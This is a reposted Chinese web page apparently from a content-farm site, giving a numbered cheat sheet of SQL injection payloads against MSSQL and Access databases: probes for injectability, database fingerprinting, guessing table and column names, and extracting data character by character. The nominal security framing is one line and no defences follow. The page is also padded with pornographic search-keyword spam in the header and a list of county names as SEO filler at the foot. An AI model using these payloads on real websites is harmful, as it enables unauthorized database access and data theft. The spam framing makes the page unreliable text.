国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > 文庫 > 正文

進行SQL注入的幾個簡單方法

2024-09-07 22:12:17
字體:
來源:轉載
供稿:網友

了解SQL注入可以有效提升程序的安全,下面給出幾個簡單的SQL注入方式:

1.判斷是否有注入;and 1=1 ;and 1=2

2.初步判斷是否是mssql ;and user>0

3.注入參數是字符'and [查詢條件] and ''='

4.搜索時沒過濾參數的'and [查詢條件] and '%25'='

5.判斷數據庫系統

;and (select count(*) from sysobjects)>0 mssql
  ;and (select count(*) from msysobjects)>0 access

6.猜數據庫 ;and (select Count(*) from [數據庫名])>0

7.猜字段 ;and (select Count(字段名) from 數據庫名)>0

8.猜字段中記錄長度 ;and (select top 1 len(字段名) from 數據庫名)>0

9.

(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 數據庫名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 數據庫名)>0

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 东宁县| 利川市| 台东县| 镇赉县| 页游| 商丘市| 双鸭山市| 叶城县| 云和县| 开封县| 当阳市| 南江县| 鲁甸县| 乃东县| 沙湾县| 洪雅县| 常德市| 南昌市| 绥芬河市| 海口市| 绍兴县| 六安市| 高邮市| 鲜城| 金溪县| 陇川县| 纳雍县| 布尔津县| 留坝县| 昆山市| 巴彦县| 抚松县| 龙游县| 迭部县| 安宁市| 奉化市| 姜堰市| 仙游县| 驻马店市| 嘉兴市| 嘉兴市|